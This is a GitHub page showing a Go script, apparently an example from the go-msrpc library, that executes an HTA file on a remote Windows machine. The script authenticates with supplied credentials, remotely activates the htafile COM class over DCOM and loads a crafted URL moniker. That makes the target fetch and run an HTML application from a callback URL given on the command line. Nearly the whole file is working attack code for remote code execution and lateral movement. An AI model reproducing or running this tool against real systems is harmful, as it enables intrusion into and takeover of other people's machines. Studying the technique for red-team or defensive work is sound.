-
Notifications
You must be signed in to change notification settings - Fork 22
Expand file tree
/
Copy pathdcom_urlmon_htafile_exec.go
More file actions
226 lines (204 loc) · 7.11 KB
/
dcom_urlmon_htafile_exec.go
File metadata and controls
226 lines (204 loc) · 7.11 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
//go:build exclude
// Script to execute HTA file (HTML application) on a remote machine.
package main
import (
"context"
"encoding/binary"
"errors"
"flag"
"fmt"
"net"
"os"
"github.com/oiweiwei/go-msrpc/dcerpc"
"github.com/oiweiwei/go-msrpc/midl/uuid"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon/imoniker/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon/ipersistmoniker/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dtyp"
"github.com/oiweiwei/go-msrpc/ndr"
"github.com/oiweiwei/go-msrpc/text/encoding/utf16le"
"github.com/oiweiwei/go-msrpc/msrpc/dcom"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/iactivation/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/iobjectexporter/v0"
"github.com/oiweiwei/go-msrpc/ssp"
"github.com/oiweiwei/go-msrpc/ssp/credential"
"github.com/oiweiwei/go-msrpc/ssp/gssapi"
"github.com/oiweiwei/go-msrpc/msrpc/erref/hresult"
_ "github.com/oiweiwei/go-msrpc/msrpc/erref/win32"
_ "github.com/oiweiwei/go-msrpc/msrpc/erref/wmi"
)
const (
UriCreateAllowRelative uint32 = 0x00000001
UriCreateAllowImplicitWildcardScheme uint32 = 0x00000002
UriCreateAllowImplicitFileScheme uint32 = 0x00000004
UriCreateNoFrag uint32 = 0x00000008
UriCreateNoCanonicalize uint32 = 0x00000010
UriCreateFileUseDosPath uint32 = 0x00000020
UriCreateDecodeExtraInfo uint32 = 0x00000040
UriCreateNoDecodeExtraInfo uint32 = 0x00000080
UriCreateCanonicalize uint32 = 0x00000100
UriCreateCrackUnknownSchemes uint32 = 0x00000200
UriCreateNoCrackUnknownSchemes uint32 = 0x00000400
UriCreatePreProcessHTMLURI uint32 = 0x00000800
UriCreateNoPreProcessHTMLURI uint32 = 0x00001000
UriCreateIESettings uint32 = 0x00002000
UriCreateNoIESettings uint32 = 0x00004000
UriCreateNoEncodeForbiddenChars uint32 = 0x00008000
UriCreateNormalizeIntlChars uint32 = 0x00010000
)
var (
callback string
target string
serialGUID = dtyp.GUIDFromUUID(uuid.MustParse("F4815879-1D3B-487F-AF2C-825DC4852763"))
htafileClassID = (*dcom.ClassID)(dtyp.GUIDFromUUID(uuid.MustParse("3050F4D8-98B5-11CF-BB82-00AA00BDCE0B")))
urlMonikerClassID = (*dcom.ClassID)(dtyp.GUIDFromUUID(uuid.MustParse("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")))
)
func init() {
// add credentials.
gssapi.AddCredential(credential.NewFromPassword(os.Getenv("USERNAME"), os.Getenv("PASSWORD")))
// add mechanism.
gssapi.AddMechanism(ssp.SPNEGO)
gssapi.AddMechanism(ssp.NTLM)
flag.StringVar(&callback, "url", "", "callback url")
flag.StringVar(&target, "server", os.Getenv("SERVER_NAME"), "server name")
flag.Parse()
}
func main() {
if callback == "" {
fmt.Fprintln(os.Stderr, "callback url (-url) is required")
flag.Usage()
os.Exit(1)
}
if target == "" {
fmt.Fprintln(os.Stderr, "target server (-server) is required")
flag.Usage()
os.Exit(1)
}
ctx := gssapi.NewSecurityContext(context.Background())
// ObjectExporter uses well-known endpoint 135.
cc, err := dcerpc.Dial(ctx, net.JoinHostPort(target, "135"))
if err != nil {
panic(err)
}
defer func() {
if cc != nil {
cc.Close(ctx)
}
}()
// Create an object exporter client.
cli, err := iobjectexporter.NewObjectExporterClient(ctx, cc, dcerpc.WithSign(), dcerpc.WithTargetName(target))
if err != nil {
panic(err)
}
// Call ServerAlive2 to determine the bindings & COM version.
srv, err := cli.ServerAlive2(ctx, &iobjectexporter.ServerAlive2Request{})
if err != nil {
panic(err)
}
// Create an activation client.
iact, err := iactivation.NewActivationClient(ctx, cc, dcerpc.WithSign(), dcerpc.WithTargetName(target))
if err != nil {
panic(err)
}
// Perform remote activation.
act, err := iact.RemoteActivation(ctx, &iactivation.RemoteActivationRequest{
ORPCThis: &dcom.ORPCThis{Version: srv.COMVersion},
ClassID: htafileClassID.GUID(),
IIDs: []*dcom.IID{ipersistmoniker.PersistMonikerIID},
// for TCP/IP it must be []uint16{7} / for named pipes: []uint16{15}.
RequestedProtocolSequences: []uint16{7, 15},
})
if err != nil {
panic(err)
}
if act.HResult != 0 {
fmt.Fprintln(os.Stderr, hresult.FromCode(uint32(act.HResult)))
os.Exit(1)
}
if err != nil {
panic(err)
}
ipid := act.InterfaceData[0].GetStandardObjectReference().Std.IPID // Activated instance ID
// Dial activated instance
cc, err = dcerpc.Dial(ctx, target,
append(act.OXIDBindings.EndpointsByProtocol("ncacn_ip_tcp"), dcerpc.WithSign(), dcom.WithIPID(ipid))...)
if err != nil {
panic(err)
}
// Create IPersistMoniker client.
ipmc, err := ipersistmoniker.NewPersistMonikerClient(ctx, cc, dcom.WithIPID(ipid))
if err != nil {
panic(err)
}
// Craft wrapped URL Moniker
mon, err := getUrlMoniker(callback, UriCreateCanonicalize|UriCreateCrackUnknownSchemes)
if err != nil {
panic(err)
}
// Load crafted URL Moniker
lrs, err := ipmc.Load(ctx, &ipersistmoniker.LoadRequest{
This: &dcom.ORPCThis{Version: srv.COMVersion},
Name: mon,
})
if err != nil {
// Example of how to handle URL Moniker related errors.
if errors.Is(err, hresult.InetEInvalidUrl) {
fmt.Fprintln(os.Stderr, "Server reported invalid URL:", callback)
}
}
_ = lrs
}
// URLMoniker represents the relevant fields of a URL Moniker.
// See https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-oshared/4948a119-c4e4-46b6-9609-0525118552e8
type URLMoniker struct {
URL string
HasExtras bool // whether to include trailer with SerialGUID/SerialVersion/URIFlags on marshal
SerialVersion uint32 // should be 0 when HasExtras; preserved on unmarshal
URIFlags uint32 // the URICreateFlags bitmask (meaning per CreateUri)
}
// MarshalBinary implements encoding.BinaryMarshaler.
func (m URLMoniker) MarshalBinary() ([]byte, error) {
// UTF-16LE encode URL + terminating NUL.
urlBytes, err := utf16le.Encode(m.URL + "\x00")
if err != nil {
return nil, err
}
var out []byte
if m.HasExtras {
out = make([]byte, 4+len(urlBytes)+16+4+4)
copy(out[4+len(urlBytes):], serialGUID.UUID().EncodeBinary())
binary.LittleEndian.PutUint32(out[4+len(urlBytes)+16:], m.SerialVersion)
binary.LittleEndian.PutUint32(out[4+len(urlBytes)+16+4:], m.URIFlags)
} else {
out = make([]byte, 4+len(urlBytes))
}
binary.LittleEndian.PutUint32(out, uint32(len(out)-4))
copy(out[4:], urlBytes)
return out, nil
}
// getUrlMoniker returns a wrapped URL Moniker for the given URL string.
func getUrlMoniker(url string, flags uint32) (*urlmon.Moniker, error) {
blob, err := URLMoniker{URL: url, HasExtras: true, URIFlags: flags}.MarshalBinary()
if err != nil {
return nil, err
}
objRef := &dcom.ObjectReference{
Signature: ([]byte)(dcom.ObjectReferenceCustomSignature),
Flags: dcom.ObjectReferenceTypeCustom,
IID: imoniker.MonikerIID,
ObjectReference: &dcom.ObjectReference_ObjectReference{
Value: &dcom.ObjectReference_Custom{
Custom: &dcom.ObjectReferenceCustom{
ClassID: urlMonikerClassID,
Size: uint32(len(blob)),
ObjectData: blob,
},
},
},
}
dat, err := ndr.Marshal(objRef, ndr.Opaque)
if err != nil {
return nil, err
}
return &urlmon.Moniker{Data: dat}, nil
}